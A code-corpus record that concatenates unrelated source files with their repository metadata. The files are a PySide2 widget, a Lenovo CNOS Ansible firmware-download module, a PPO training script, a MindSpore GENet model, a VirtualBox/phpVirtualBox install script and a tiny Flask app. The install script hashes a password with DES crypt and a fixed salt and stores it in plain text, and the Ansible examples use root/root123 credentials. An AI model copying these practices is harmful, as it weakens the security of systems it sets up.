[ "MIT" ]
null
null
null
# from PySide2.QtWidgets import ... # from PySide2.QtCore import ... # from PySide2.QtGui import ... from PySide2.QtGui import QImage, QPixmap from PySide2.QtWidgets import QLabel import cv2 class TopHat_NodeInstance_MainWidget(QLabel): def __init__(self, parent_node_instance): super(TopHat_NodeInstance_MainWidget, self).__init__() # leave these lines ------------------------------ self.parent_node_instance = parent_node_instance # ------------------------------------------------ self.resize(200, 200) def show_image(self, cv_image): self.resize(200, 200) rgb_image = cv2.cvtColor(cv_image, cv2.COLOR_BGR2RGB) h, w, ch = rgb_image.shape bytes_per_line = ch * w qt_image = QImage(rgb_image.data, w, h, bytes_per_line, QImage.Format_RGB888) img_w = qt_image.width() img_h = qt_image.height() proportion = img_w / img_h self.resize(self.width() * proportion, self.height()) qt_image = qt_image.scaled(self.width(), self.height()) self.setPixmap(QPixmap(qt_image)) self.parent_node_instance.update_shape() def get_data(self): return self.text() def set_data(self, data): self.setText(data) # optional - important for threading - stop everything here def removing(self): pass
30.466667
85
0.625091
0ab3d809a5389df90021eae3ed8f13b056c852ec
8,972
py
Python
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/network/cnos/cnos_image.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/network/cnos/cnos_image.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/network/cnos/cnos_image.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
#!/usr/bin/python # -*- coding: utf-8 -*- from __future__ import (absolute_import, division, print_function) __metaclass__ = type # # Copyright (C) 2017 Lenovo, Inc. # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # # Module to download new image to Lenovo Switches # Lenovo Networking # ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: cnos_image author: "Anil Kumar Muraleedharan (@amuraleedhar)" short_description: Perform firmware upgrade/download from a remote server on devices running Lenovo CNOS description: - This module allows you to work with switch firmware images. It provides a way to download a firmware image to a network device from a remote server using FTP, SFTP, TFTP, or SCP. The first step is to create a directory from where the remote server can be reached. The next step is to provide the full file path of the image's location. Authentication details required by the remote server must be provided as well. By default, this method makes the newly downloaded firmware image the active image, which will be used by the switch during the next restart. This module uses SSH to manage network device configuration. The results of the operation will be placed in a directory named 'results' that must be created by the user in their local directory to where the playbook is run. extends_documentation_fragment: - community.general.cnos options: protocol: description: - This refers to the protocol used by the network device to interact with the remote server from where to download the firmware image. The choices are FTP, SFTP, TFTP, or SCP. Any other protocols will result in error. If this parameter is not specified there is no default value to be used. required: true choices: [SFTP, SCP, FTP, TFTP] serverip: description: - This specifies the IP Address of the remote server from where the software image will be downloaded. required: true imgpath: description: - This specifies the full file path of the image located on the remote server. In case the relative path is used as the variable value, the root folder for the user of the server needs to be specified. required: true imgtype: description: - This specifies the firmware image type to be downloaded required: true choices: [all, boot, os, onie] serverusername: description: - Specify the username for the server relating to the protocol used required: true serverpassword: description: - Specify the password for the server relating to the protocol used ''' EXAMPLES = ''' Tasks : The following are examples of using the module cnos_image. These are written in the main.yml file of the tasks directory. --- - name: Test Image transfer cnos_image: deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}" outputfile: "./results/test_image_{{ inventory_hostname }}_output.txt" protocol: "sftp" serverip: "10.241.106.118" imgpath: "/root/cnos_images/G8272-10.1.0.112.img" imgtype: "os" serverusername: "root" serverpassword: "root123" - name: Test Image tftp cnos_image: deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}" outputfile: "./results/test_image_{{ inventory_hostname }}_output.txt" protocol: "tftp" serverip: "10.241.106.118" imgpath: "/anil/G8272-10.2.0.34.img" imgtype: "os" serverusername: "root" serverpassword: "root123" ''' RETURN = ''' msg: description: Success or failure message returned: always type: str sample: "Image file transferred to device" ''' import sys import time import socket import array import json import time import re import os try: from ansible_collections.community.general.plugins.module_utils.network.cnos import cnos HAS_LIB = True except Exception: HAS_LIB = False from ansible.module_utils.basic import AnsibleModule from collections import defaultdict def doImageDownload(module, prompt, answer): protocol = module.params['protocol'].lower() server = module.params['serverip'] imgPath = module.params['imgpath'] imgType = module.params['imgtype'] username = module.params['serverusername'] password = module.params['serverpassword'] retVal = '' command = "copy " + protocol + " " + protocol + "://" + username + "@" command = command + server + "/" + imgPath + " system-image " command = command + imgType + " vrf management" cmd = [] if(protocol == "scp"): prompt = ['timeout', 'Confirm download operation', 'Password', 'Do you want to change that to the standby image'] answer = ['240', 'y', password, 'y'] scp_cmd = [{'command': command, 'prompt': prompt, 'answer': answer, 'check_all': True}] cmd.extend(scp_cmd) retVal = retVal + str(cnos.run_cnos_commands(module, cmd)) elif(protocol == "sftp"): prompt = ['Confirm download operation', 'Password', 'Do you want to change that to the standby image'] answer = ['y', password, 'y'] sftp_cmd = [{'command': command, 'prompt': prompt, 'answer': answer, 'check_all': True}] cmd.extend(sftp_cmd) retVal = retVal + str(cnos.run_cnos_commands(module, cmd)) elif(protocol == "ftp"): prompt = ['Confirm download operation', 'Password', 'Do you want to change that to the standby image'] answer = ['y', password, 'y'] ftp_cmd = [{'command': command, 'prompt': prompt, 'answer': answer, 'check_all': True}] cmd.extend(ftp_cmd) retVal = retVal + str(cnos.run_cnos_commands(module, cmd)) elif(protocol == "tftp"): command = "copy " + protocol + " " + protocol + "://" + server command = command + "/" + imgPath + " system-image " + imgType command = command + " vrf management" prompt = ['Confirm download operation', 'Do you want to change that to the standby image'] answer = ['y', 'y'] tftp_cmd = [{'command': command, 'prompt': prompt, 'answer': answer, 'check_all': True}] cmd.extend(tftp_cmd) retVal = retVal + str(cnos.run_cnos_commands(module, cmd)) else: return "Error-110" return retVal # EOM def main(): module = AnsibleModule( argument_spec=dict( outputfile=dict(required=True), host=dict(required=False), username=dict(required=False), password=dict(required=False, no_log=True), enablePassword=dict(required=False, no_log=True), deviceType=dict(required=True), protocol=dict(required=True), serverip=dict(required=True), imgpath=dict(required=True), imgtype=dict(required=True), serverusername=dict(required=False), serverpassword=dict(required=False, no_log=True),), supports_check_mode=False) outputfile = module.params['outputfile'] protocol = module.params['protocol'].lower() output = '' # Invoke method for image transfer from server if(protocol == "tftp" or protocol == "ftp" or protocol == "sftp" or protocol == "scp"): transfer_status = doImageDownload(module, None, None) else: transfer_status = "Invalid Protocol option" output = output + "\n Image Transfer status \n" + transfer_status # Save it into the file path = outputfile.rsplit('/', 1) if not os.path.exists(path[0]): os.makedirs(path[0]) file = open(outputfile, "a") file.write(output) file.close() # Logic to check when changes occur or not errorMsg = cnos.checkOutputForError(output) if(errorMsg is None): module.exit_json(changed=True, msg="Image file transferred to device") else: module.fail_json(msg=errorMsg) if __name__ == '__main__': main()
37.07438
92
0.646121
0ae802e4917c2a13270b04fb4de96f98679c021e
10,268
py
Python
PPO-PyTorch/train.py
xixiha5230/RL
cc957a4231263074b8cf7fad6ba276f4b3899670
[ "MIT" ]
null
null
null
PPO-PyTorch/train.py
xixiha5230/RL
cc957a4231263074b8cf7fad6ba276f4b3899670
[ "MIT" ]
null
null
null
PPO-PyTorch/train.py
xixiha5230/RL
cc957a4231263074b8cf7fad6ba276f4b3899670
[ "MIT" ]
null
null
null
import os import glob import time from datetime import datetime import torch import numpy as np import gym from PPO import PPO ################################### Training ################################### def train(): print("============================================================================================") ####### initialize environment hyperparameters ###### env_name = "Walker2d-v2" has_continuous_action_space = True # continuous action space; else discrete max_ep_len = 1000 # max timesteps in one episode max_training_timesteps = int(3e6) # break training loop if timeteps > max_training_timesteps print_freq = max_ep_len * 10 # print avg reward in the interval (in num timesteps) log_freq = max_ep_len * 2 # log avg reward in the interval (in num timesteps) save_model_freq = int(1e5) # save model frequency (in num timesteps) action_std = 0.6 # starting std for action distribution (Multivariate Normal) action_std_decay_rate = 0.05 # linearly decay action_std (action_std = action_std - action_std_decay_rate) min_action_std = 0.1 # minimum action_std (stop decay after action_std <= min_action_std) action_std_decay_freq = int(2.5e5) # action_std decay frequency (in num timesteps) ##################################################### ## Note : print/log frequencies should be > than max_ep_len ################ PPO hyperparameters ################ update_timestep = max_ep_len * 4 # update policy every n timesteps K_epochs = 80 # update policy for K epochs in one PPO update eps_clip = 0.2 # clip parameter for PPO gamma = 0.99 # discount factor lr_actor = 0.0003 # learning rate for actor network lr_critic = 0.001 # learning rate for critic network random_seed = 0 # set random seed if required (0 = no random seed) ##################################################### print("training environment name : " + env_name) env = gym.make(env_name) # state space dimension state_dim = env.observation_space.shape[0] # action space dimension if has_continuous_action_space: action_dim = env.action_space.shape[0] else: action_dim = env.action_space.n ###################### logging ###################### #### log files for multiple runs are NOT overwritten log_dir = "PPO-PyTorch/PPO_logs" if not os.path.exists(log_dir): os.makedirs(log_dir) log_dir = log_dir + '/' + env_name + '/' if not os.path.exists(log_dir): os.makedirs(log_dir) #### get number of log files in log directory run_num = 0 current_num_files = next(os.walk(log_dir))[2] run_num = len(current_num_files) #### create new log file for each run log_f_name = log_dir + '/PPO_' + env_name + "_log_" + str(run_num) + ".csv" print("current logging run number for " + env_name + " : ", run_num) print("logging at : " + log_f_name) ##################################################### ################### checkpointing ################### run_num_pretrained = 0 #### change this to prevent overwriting weights in same env_name folder directory = "PPO-PyTorch/PPO_preTrained" if not os.path.exists(directory): os.makedirs(directory) directory = directory + '/' + env_name + '/' if not os.path.exists(directory): os.makedirs(directory) checkpoint_path = directory + "PPO_{}_{}_{}.pth".format(env_name, random_seed, run_num_pretrained) print("save checkpoint path : " + checkpoint_path) ##################################################### ############# print all hyperparameters ############# print("--------------------------------------------------------------------------------------------") print("max training timesteps : ", max_training_timesteps) print("max timesteps per episode : ", max_ep_len) print("model saving frequency : " + str(save_model_freq) + " timesteps") print("log frequency : " + str(log_freq) + " timesteps") print("printing average reward over episodes in last : " + str(print_freq) + " timesteps") print("--------------------------------------------------------------------------------------------") print("state space dimension : ", state_dim) print("action space dimension : ", action_dim) print("--------------------------------------------------------------------------------------------") if has_continuous_action_space: print("Initializing a continuous action space policy") print("--------------------------------------------------------------------------------------------") print("starting std of action distribution : ", action_std) print("decay rate of std of action distribution : ", action_std_decay_rate) print("minimum std of action distribution : ", min_action_std) print("decay frequency of std of action distribution : " + str(action_std_decay_freq) + " timesteps") else: print("Initializing a discrete action space policy") print("--------------------------------------------------------------------------------------------") print("PPO update frequency : " + str(update_timestep) + " timesteps") print("PPO K epochs : ", K_epochs) print("PPO epsilon clip : ", eps_clip) print("discount factor (gamma) : ", gamma) print("--------------------------------------------------------------------------------------------") print("optimizer learning rate actor : ", lr_actor) print("optimizer learning rate critic : ", lr_critic) if random_seed: print("--------------------------------------------------------------------------------------------") print("setting random seed to ", random_seed) torch.manual_seed(random_seed) env.seed(random_seed) np.random.seed(random_seed) ##################################################### print("============================================================================================") ################# training procedure ################ # initialize a PPO agent ppo_agent = PPO(state_dim, action_dim, lr_actor, lr_critic, gamma, K_epochs, eps_clip, has_continuous_action_space, action_std) # track total training time start_time = datetime.now().replace(microsecond=0) print("Started training at (GMT) : ", start_time) print("============================================================================================") # logging file log_f = open(log_f_name,"w+") log_f.write('episode,timestep,reward\n') # printing and logging variables print_running_reward = 0 print_running_episodes = 0 log_running_reward = 0 log_running_episodes = 0 time_step = 0 i_episode = 0 # training loop while time_step <= max_training_timesteps: state = env.reset() current_ep_reward = 0 for t in range(1, max_ep_len+1): # select action with policy action = ppo_agent.select_action(state) state, reward, done, _ = env.step(action) # saving reward and is_terminals ppo_agent.buffer.rewards.append(reward) ppo_agent.buffer.is_terminals.append(done) time_step +=1 current_ep_reward += reward # update PPO agent if time_step % update_timestep == 0: ppo_agent.update() # if continuous action space; then decay action std of ouput action distribution if has_continuous_action_space and time_step % action_std_decay_freq == 0: ppo_agent.decay_action_std(action_std_decay_rate, min_action_std) # log in logging file if time_step % log_freq == 0: # log average reward till last episode log_avg_reward = log_running_reward / log_running_episodes log_avg_reward = round(log_avg_reward, 4) log_f.write('{},{},{}\n'.format(i_episode, time_step, log_avg_reward)) log_f.flush() log_running_reward = 0 log_running_episodes = 0 # printing average reward if time_step % print_freq == 0: # print average reward till last episode print_avg_reward = print_running_reward / print_running_episodes print_avg_reward = round(print_avg_reward, 2) print("Episode : {} \t\t Timestep : {} \t\t Average Reward : {}".format(i_episode, time_step, print_avg_reward)) print_running_reward = 0 print_running_episodes = 0 # save model weights if time_step % save_model_freq == 0: print("--------------------------------------------------------------------------------------------") print("saving model at : " + checkpoint_path) ppo_agent.save(checkpoint_path) print("model saved") print("Elapsed Time : ", datetime.now().replace(microsecond=0) - start_time) print("--------------------------------------------------------------------------------------------") # break; if the episode is over if done: break print_running_reward += current_ep_reward print_running_episodes += 1 log_running_reward += current_ep_reward log_running_episodes += 1 i_episode += 1 log_f.close() env.close() # print total training time print("============================================================================================") end_time = datetime.now().replace(microsecond=0) print("Started training at (GMT) : ", start_time) print("Finished training at (GMT) : ", end_time) print("Total training time : ", end_time - start_time) print("============================================================================================") if __name__ == '__main__': train()
39.340996
131
0.517335
d48f1edc0948b830163a701f0e132ef9983eb689
11,775
py
Python
research/cv/GENet_Res50/src/GENet.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
research/cv/GENet_Res50/src/GENet.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
research/cv/GENet_Res50/src/GENet.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """GENet.""" import math import numpy as np import mindspore.nn as nn from mindspore.ops import operations as P from mindspore.common.tensor import Tensor from src.GEBlock import GEBlock def calculate_gain(nonlinearity, param=None): """calculate_gain""" linear_fns = ['linear', 'conv1d', 'conv2d', 'conv3d', 'conv_transpose1d', 'conv_transpose2d', 'conv_transpose3d'] res = 0 if nonlinearity in linear_fns or nonlinearity == 'sigmoid': res = 1 elif nonlinearity == 'tanh': res = 5.0 / 3 elif nonlinearity == 'relu': res = math.sqrt(2.0) elif nonlinearity == 'leaky_relu': if param is None: negative_slope = 0.01 elif not isinstance(param, bool) and isinstance(param, int) or isinstance(param, float): # True/False are instances of int, hence check above negative_slope = param else: raise ValueError("negative_slope {} not a valid number".format(param)) res = math.sqrt(2.0 / (1 + negative_slope ** 2)) else: raise ValueError("Unsupported nonlinearity {}".format(nonlinearity)) return res def _calculate_fan_in_and_fan_out(tensor): """ _calculate_fan_in_and_fan_out """ dimensions = len(tensor) if dimensions < 2: raise ValueError("Fan in and fan out can not be computed for tensor" " with fewer than 2 dimensions") if dimensions == 2: # Linear fan_in = tensor[1] fan_out = tensor[0] else: num_input_fmaps = tensor[1] num_output_fmaps = tensor[0] receptive_field_size = 1 if dimensions > 2: receptive_field_size = tensor[2] * tensor[3] fan_in = num_input_fmaps * receptive_field_size fan_out = num_output_fmaps * receptive_field_size return fan_in, fan_out def _calculate_correct_fan(tensor, mode): """ for pylint. """ mode = mode.lower() valid_modes = ['fan_in', 'fan_out'] if mode not in valid_modes: raise ValueError("Mode {} not supported, please use one of {}".format(mode, valid_modes)) fan_in, fan_out = _calculate_fan_in_and_fan_out(tensor) return fan_in if mode == 'fan_in' else fan_out def kaiming_normal(inputs_shape, a=0, mode='fan_in', nonlinearity='leaky_relu'): """ for pylint. """ fan = _calculate_correct_fan(inputs_shape, mode) gain = calculate_gain(nonlinearity, a) std = gain / math.sqrt(fan) return np.random.normal(0, std, size=inputs_shape).astype(np.float32) def kaiming_uniform(inputs_shape, a=0., mode='fan_in', nonlinearity='leaky_relu'): """ for pylint. """ fan = _calculate_correct_fan(inputs_shape, mode) gain = calculate_gain(nonlinearity, a) std = gain / math.sqrt(fan) bound = math.sqrt(3.0) * std # Calculate uniform bounds from standard deviation return np.random.uniform(-bound, bound, size=inputs_shape).astype(np.float32) def _conv3x3(in_channel, out_channel, stride=1): weight_shape = (out_channel, in_channel, 3, 3) weight = Tensor(kaiming_normal(weight_shape, mode="fan_out", nonlinearity='relu')) return nn.Conv2d(in_channel, out_channel, kernel_size=3, stride=stride, padding=0, pad_mode='same', weight_init=weight) def _conv1x1(in_channel, out_channel, stride=1): weight_shape = (out_channel, in_channel, 1, 1) weight = Tensor(kaiming_normal(weight_shape, mode="fan_out", nonlinearity='relu')) return nn.Conv2d(in_channel, out_channel, kernel_size=1, stride=stride, padding=0, pad_mode='same', weight_init=weight) def _conv7x7(in_channel, out_channel, stride=1): weight_shape = (out_channel, in_channel, 7, 7) weight = Tensor(kaiming_normal(weight_shape, mode="fan_out", nonlinearity='relu')) return nn.Conv2d(in_channel, out_channel, kernel_size=7, stride=stride, padding=0, pad_mode='same', weight_init=weight) def _bn(channel): return nn.BatchNorm2d(channel, eps=1e-4, momentum=0.95, gamma_init=1, beta_init=0, moving_mean_init=0, moving_var_init=1) def _bn_last(channel): return nn.BatchNorm2d(channel, eps=1e-4, momentum=0.95, gamma_init=0, beta_init=0, moving_mean_init=0, moving_var_init=1) def _fc(in_channel, out_channel): weight_shape = (out_channel, in_channel) weight = Tensor(kaiming_uniform(weight_shape, a=math.sqrt(5))) return nn.Dense(in_channel, out_channel, has_bias=True, weight_init=weight, bias_init=0) class GENet(nn.Cell): """ GENet architecture. Args: block (Cell): Block for network. layer_nums (list): Numbers of block in different layers. in_channels (list): Input channel in each layer. out_channels (list): Output channel in each layer. strides (list): Stride size in each layer. spatial(list): Numbers of output spatial size of different groups. num_classes (int): The number of classes that the training images are belonging to. extra_params(bool) : Whether to use DW Conv to down-sample mlp(bool) : Whether to combine SENet (using 1*1 conv) Returns: Tensor, output tensor. Examples: >>> GENet(GEBlock, >>> [3, 4, 6, 3], >>> [64, 256, 512, 1024], >>> [256, 512, 1024, 2048], >>> [1, 2, 2, 2], >>> [56,28,14,7] >>> 1001,True,True) """ def __init__(self, block, layer_nums, in_channels, out_channels, strides, spatial, num_classes, extra_params, mlp): super(GENet, self).__init__() if not len(layer_nums) == len(in_channels) == len(out_channels) == 4: raise ValueError("the length of layer_num, in_channels, out_channels list must be 4!") self.extra = extra_params # initial stage self.conv1 = _conv7x7(3, 64, stride=2) self.bn1 = _bn(64) self.relu = P.ReLU() self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, pad_mode="same") self.layer1 = self._make_layer(block=block, layer_num=layer_nums[0], in_channel=in_channels[0], out_channel=out_channels[0], stride=strides[0], spatial=spatial[0], extra_params=extra_params, mlp=mlp) self.layer2 = self._make_layer(block=block, layer_num=layer_nums[1], in_channel=in_channels[1], out_channel=out_channels[1], stride=strides[1], spatial=spatial[1], extra_params=extra_params, mlp=mlp) self.layer3 = self._make_layer(block=block, layer_num=layer_nums[2], in_channel=in_channels[2], out_channel=out_channels[2], stride=strides[2], spatial=spatial[2], extra_params=extra_params, mlp=mlp) self.layer4 = self._make_layer(block=block, layer_num=layer_nums[3], in_channel=in_channels[3], out_channel=out_channels[3], stride=strides[3], spatial=spatial[3], extra_params=extra_params, mlp=mlp) self.mean = P.ReduceMean(keep_dims=True) self.flatten = nn.Flatten() self.end_point = _fc(out_channels[3], num_classes) def _make_layer(self, block, layer_num, in_channel, out_channel, stride, spatial, extra_params, mlp): """ Make stage network of GENet. Args: block (Cell): GENet block. layer_num (int): Layer number. in_channel (int): Input channel. out_channel (int): Output channel. stride (int): Stride size for the first convolutional layer. spatial(int): output spatial size of every block in same group. extra_params(bool) : Whether to use DW Conv to down-sample mlp(bool) : Whether to combine SENet (using 1*1 conv) Returns: SequentialCell, the output layer. """ layers = [] ge_block = block(in_channel=in_channel, out_channel=out_channel, stride=stride, spatial=spatial, extra_params=extra_params, mlp=mlp) layers.append(ge_block) for _ in range(1, layer_num): ge_block = block(in_channel=out_channel, out_channel=out_channel, stride=1, spatial=spatial, extra_params=extra_params, mlp=mlp) layers.append(ge_block) return nn.SequentialCell(layers) def construct(self, x): """ Args: x : input Tensor. """ # initial stage x = self.conv1(x) x = self.bn1(x) x = self.relu(x) c1 = self.maxpool(x) # four groups c2 = self.layer1(c1) c3 = self.layer2(c2) c4 = self.layer3(c3) c5 = self.layer4(c4) out = self.mean(c5, (2, 3)) out = self.flatten(out) out = self.end_point(out) return out def GE_resnet50(class_num=1000, extra=True, mlp=True): """ Get GE-ResNet50 neural network. Default : GE Theta+ version (best) Args: class_num (int): Class number. extra(bool) : Whether to use DW Conv to down-sample mlp(bool) : Whether to combine SENet (using 1*1 conv) Returns: Cell, cell instance of GENet-ResNet50 neural network. Examples: >>> net = GE_resnet50(1000) """ return GENet(block=GEBlock, layer_nums=[3, 4, 6, 3], in_channels=[64, 256, 512, 1024], out_channels=[256, 512, 1024, 2048], strides=[1, 2, 2, 2], spatial=[56, 28, 14, 7], num_classes=class_num, extra_params=extra, mlp=mlp)
37.028302
98
0.552187
d4a2677671d9c96bb49b249f3b70ff6fcc9f9468
5,941
py
Python
LF6/vb.py
JohannesMuelle/workshops
af9140159e3872aff75864ced99b5163d7bba1ba
[ "CC0-1.0" ]
5
2016-07-07T09:00:31.000Z
2017-03-09T22:46:33.000Z
LF6/vb.py
JohannesMuelle/workshops
af9140159e3872aff75864ced99b5163d7bba1ba
[ "CC0-1.0" ]
null
null
null
LF6/vb.py
JohannesMuelle/workshops
af9140159e3872aff75864ced99b5163d7bba1ba
[ "CC0-1.0" ]
8
2016-05-13T14:29:06.000Z
2019-10-20T16:43:32.000Z
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import os, subprocess import sys, traceback import crypt # Passwort für den User vbox print("Dieses Skript installiert VirtualBox und phpVirtualBox auf dem System") print("Es ist zu unterscheiden zwischen dem Benutzer unter dem die Anwendung läuft und dem Benutzer, der sich auf der Weboberfläche anmeldet.") print("Die Anmeldung auf der Weboberfläche ist zu Beginn admin/admin und wird aufgerufen über IP/phpvirtualbox bzw. Servername/phpvirtualbox") print("Sie werden jetzt nach dem Passwort gefragt für den Benutzer vbox. Der Benutzer vbox ist der Benutzer unter dem die Anwendung VirtualBox ausgeführt wird.") print ( "This script installs VirtualBox and phpVirtualBox on the system") print ( "It is necessary to distinguish between the user under which the application is running and the user who logs on to the web interface.") print ( "The registration on the web interface is called at the beginning admin / admin and is under IP/phpvirtualbox or ServerName/phpvirtualbox") print ( "You are now asked for the password for the user vbox. The user is the user vbox under which VirtualBox is running.") print ("Please enter the password for the user vbox a:") password = input("Bitte geben Sie das Passwort für den Benutzer vbox ein:") pass1 = "'"+password+"'" print("UPDATE") try: cmd1 = os.system("apt-get -q -y update") cmd1 = os.system("apt-get -q -y upgrade") except: print("Update fehlgeschlagen!") try: print("Installation von einigen Basisprogrammen") cmd1 = os.system("apt -q -y install screen") cmd1 = os.system("apt -q -y install python-software-properties") cmd1 = os.system("apt -q -y install wget") except: print("Installation fehlgeschlagen") try: print("Repository hinzufügen") output = subprocess.check_output("lsb_release -sc", shell = True) lsb = str(output, 'utf-8').strip() cmd1 = os.system("add-apt-repository 'deb http://download.virtualbox.org/virtualbox/debian "+lsb+" contrib'") cmd1 = os.system("add-apt-repository --remove 'deb-src http://download.virtualbox.org/virtualbox/debian "+lsb+" contrib'") # Änderung des Schlüssel für das Repository ab Ubuntu 16.04 (xenial) if lsb == "xenial": cmd1 = os.system("wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- | sudo apt-key add -") else: cmd1 = os.system("wget -q https://www.virtualbox.org/download/oracle_vbox.asc -O- | sudo apt-key add -") cmd1 = os.system("apt-get -q -y update") except: print("Repository hinzufügen fehlgeschlagen") print("Unexpected error:", sys.exc_info()[0]) raise try: print("Installation VirtualBox") output = subprocess.check_output("uname -r", shell = True) Kernel = str(output, 'utf-8').strip() cmd1 = os.system("apt-get install -q -y linux-headers-"+Kernel) cmd1 = os.system("apt-get install -q -y build-essential virtualbox-5.0 dkms") cmd1 = os.system("apt-get install -q -y --allow-unauthenticated virtualbox-5.0") cmd1 = os.system("apt-get install -q -y --allow-unauthenticated dkms >> vb.log") version = subprocess.check_output("vboxmanage -v", shell = True) version = str(version, 'utf-8').strip() version = version.split('r') version = version[0] cmd1 = os.system ("wget -q http://download.virtualbox.org/virtualbox/"+version+"/Oracle_VM_VirtualBox_Extension_Pack-"+version+".vbox-extpack") cmd1 = os.system("VBoxManage extpack install Oracle_VM_VirtualBox_Extension_Pack-"+version+".vbox-extpack") encPass = crypt.crypt(password,"22") cmd1 = os.system("useradd -m -p "+encPass+" vbox -G vboxusers") except: print("Installation von VirtualBox fehlgeschlagen") try: print("Installation von phpVirtualBox") print("Vorbereitung ...") # Datei /etc/default/virtualbox anlegen und User eintragen datei = open("/etc/default/virtualbox", "w") datei.write("VBOXWEB_USER=vbox") datei.close() except: print("Installation von phpVirtualBox fehlgeschlagen") try: print("Web-Server installieren ..") if lsb == "xenial": cmd1 = os.system("apt-get -q -y install php7.0 apache2-utils") cmd1 = os.system("apt-get -q -y install php7.0-mysql") cmd1 = os.system("apt-get -q -y install apache2") cmd1 = os.system("apt-get -q -y install apache2-utils") # Neues Modul ab Ubuntu 16.04: https://sourceforge.net/p/phpvirtualbox/discussion/help/thread/ae25b8e7/ cmd1 = os.system("apt-get -q -y install php7.0-xml") cmd1 = os.system("apt-get -q -y install php-soap") cmd1 = os.system("apt-get -q -y install php7.0-soap") cmd1 = os.system("apt-get -q -y install libapache2-mod-php") else: cmd1 = os.system("apt-get -q -y install php5 php5-mysql") cmd1 = os.system("apt-get -q -y install apache2") cmd1 = os.system("apt-get -q -y install apache2-utils") cmd1 = os.system("apt-get -q -y install php5-mysql") cmd1 = os.system("wget -q 'http://sourceforge.net/projects/phpvirtualbox/files/latest/download' --content-disposition") cmd1 = os.system ("apt-get -q -y install unzip") cmd1 = os.system("unzip -q -o phpvirtualbox-5.0-5.zip -d /var/www/html") cmd1 = os.system("ln -s /var/www/html/phpvirtualbox-5.0-5 /var/www/html/phpvirtualbox") cmd1 = os.system("chown -R www-data.www-data /var/www") cmd1 = os.system("service vboxweb-service stop") cmd1 = os.system("/sbin/rcvboxdrv setup") cmd1 = os.system("service vboxweb-service start") cmd1 = os.system("cp /var/www/html/phpvirtualbox/config.php-example /var/www/html/phpvirtualbox/config.php") #Datei einlesen f = open('/var/www/html/phpvirtualbox/config.php','r') filedata = f.read() f.close() newdata = filedata.replace("'pass'",pass1) f = open('/var/www/html/phpvirtualbox/config.php','w') f.write(newdata) f.close() except: print("Web-Server fehlgeschlagen")
52.575221
161
0.693318
580130c4bf321de1ed7bba8034be178ca337fef7
229
py
Python
11-Templates/app.py
dikyindrah/Flask
96f3f2b0db12b362d439d0c064dfa392ee14ad12
[ "MIT" ]
null
null
null
11-Templates/app.py
dikyindrah/Flask
96f3f2b0db12b362d439d0c064dfa392ee14ad12
[ "MIT" ]
null
null
null
11-Templates/app.py
dikyindrah/Flask
96f3f2b0db12b362d439d0c064dfa392ee14ad12
[ "MIT" ]
null
null
null
from flask import Flask, render_template app = Flask(__name__) @app.route('/login/<username>') def login(username): return render_template('login.html', username=username) if __name__ == '__main__': app.run(debug=True)
22.9
59
0.729258
ed19825faf8d5dbb74205eefbdc8d1f7820340e1
53,137
py
Python
Contrib-Inspur/openbmc/poky/bitbake/lib/bb/utils.py
opencomputeproject/Rack-Manager
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
[ "MIT" ]
5
2019-11-11T07:57:26.000Z
2022-03-28T08:26:53.000Z
Contrib-Inspur/openbmc/poky/bitbake/lib/bb/utils.py
opencomputeproject/Rack-Manager
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
[ "MIT" ]
3
2019-09-05T21:47:07.000Z
2019-09-17T18:10:45.000Z
Contrib-Inspur/openbmc/poky/bitbake/lib/bb/utils.py
opencomputeproject/Rack-Manager
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
[ "MIT" ]
11
2019-07-20T00:16:32.000Z
2022-01-11T14:17:48.000Z
